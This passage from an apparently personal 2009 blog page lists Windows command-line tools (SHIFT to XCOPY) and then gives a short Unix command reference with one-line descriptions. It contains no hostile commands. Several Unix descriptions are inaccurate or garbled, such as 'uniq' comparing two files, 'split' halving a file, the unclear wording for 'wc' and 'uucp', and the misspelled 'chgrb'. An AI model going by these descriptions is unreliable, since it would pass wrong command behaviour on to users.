SHIFT Shift the position of replaceable parameters in a batch file

SHORTCUT Create a windows shortcut (.LNK file)

SHOWGRPS List the NT Workgroups a user has joined

SHOWMBRS List the Users who are members of a Workgroup

SHUTDOWN Shutdown the computer

SLEEP Wait for x seconds

SOON Schedule a command to run in the near future

SORT Sort input

START Start a separate window to run a specified program or command

SU Switch User

SUBINACL Edit file and folder Permissions, Ownership and Domain

SUBST Associate a path with a drive letter

SYSTEMINFO List system configuration

TASKLIST List running applications and services

TIME Display or set the system time

TIMEOUT Delay processing of a batch file

TITLE Set the window title for a CMD.EXE session

TOUCH Change file timestamps

TRACERT Trace route to a remote host

TREE Graphical display of folder structure

TYPE Display the contents of a text file

USRSTAT List domain usernames and last login

VER Display version information

VERIFY Verify that files have been saved

VOL Display a disk label

WHERE Locate and display files in a directory tree

WHOAMI Output the current UserName and domain

WINDIFF Compare the contents of two files or sets of files

WINMSD Windows system diagnostics

WINMSDP Windows system diagnostics II

WMIC WMI Commands

XCACLS Change file permissions

XCOPY Copy files and folders

DISKPART Same Like Fdisk ,Imporve Version Of Fdisk in Winxp

Sunday, March 15, 2009

A Quick Unix Command Reference Guide

Alias      This allows the user to view the current aliases

awk       This will allow the user to search for a pattern within a file

bdiff     Compares two large files together

bfs      Command used to scan a large file

cal      Will show a calendar

cat      Concatenates and  prints a file

cc       A useful c compiler

cd    Used to change directories

chgrb   Changes a file groups ownership

chmod    Changes the permission on a file

chown    Used to changes the individual ownership of a file

cmp    Used to compare two files together

comm    Used to find the common line in two files

cp     Command to copy files to another location

cu      Will call another Unix System

date    Returns the date and time information

df         Shows all mounted drives on your machine

diff     Displays the difference between two files

du   Shows the disk usage in blocks for a directory

echo     Echoes the data to the screen or file

ed    Simple text editor

env     Lists the current environment variables

ex   Just another text editor

expr      Evaluates a mathmatical formula

find    Name should say enough used to find a file

f77       A Fortran Complier

format    Initializes a floppy disk

grep        Searches for a pattern within a file

help      Used for when you need help

kill        Will stop a running process

ln       Creates a link between two files

lpr      Copies the file to the line printer

ls     Lists all the files in a directory

mail    This allows the user to send/receive mail

mkdir    Used to make new directories

more    Displays a data file to the screen

mv      Command used to move or rename files

nohup     Allows a command to continue running when you log out

nroff       Editor used to format text

passwd   Allows you to change your password

pkgadd    Installs a new program onto your machine

ps       Shows a listing of  the current processes running

pwd      Displays the name of the working directory

rm      Used to remove files

rmdir   Used to remove directories

set      Lists all the variables in the current shell

setenv   Sets the environment variables

sleep      Causes a process to become inactive

source    Allows the user to execute a file

sort     Command used to sort files

spell     Used to check for spelling errors in a file

split        Divides a file in half

stty         Sets the terminal options

tail         Will display the end of a file

tar         Copies all specified files into one

touch      Creates an empty file

troff        Outputs formatted output

tset        Sets the terminal type

umask    Specify a new creation mask

uniq     Compares two files

uucp      A Unix to Unix execute

vi            A full screen editor

vipw      Opens the vi editor as well as password file for editing

volcheck  Checks to see if there is a floppy disk mounted

wc      Outputs detail in the full size

who      Shows other people online

write       Allows you to send a message to another user

!                Used to repeat last used command

Some Kannada Sites


Kannada Cyber Law Site



















Karnataka News Papers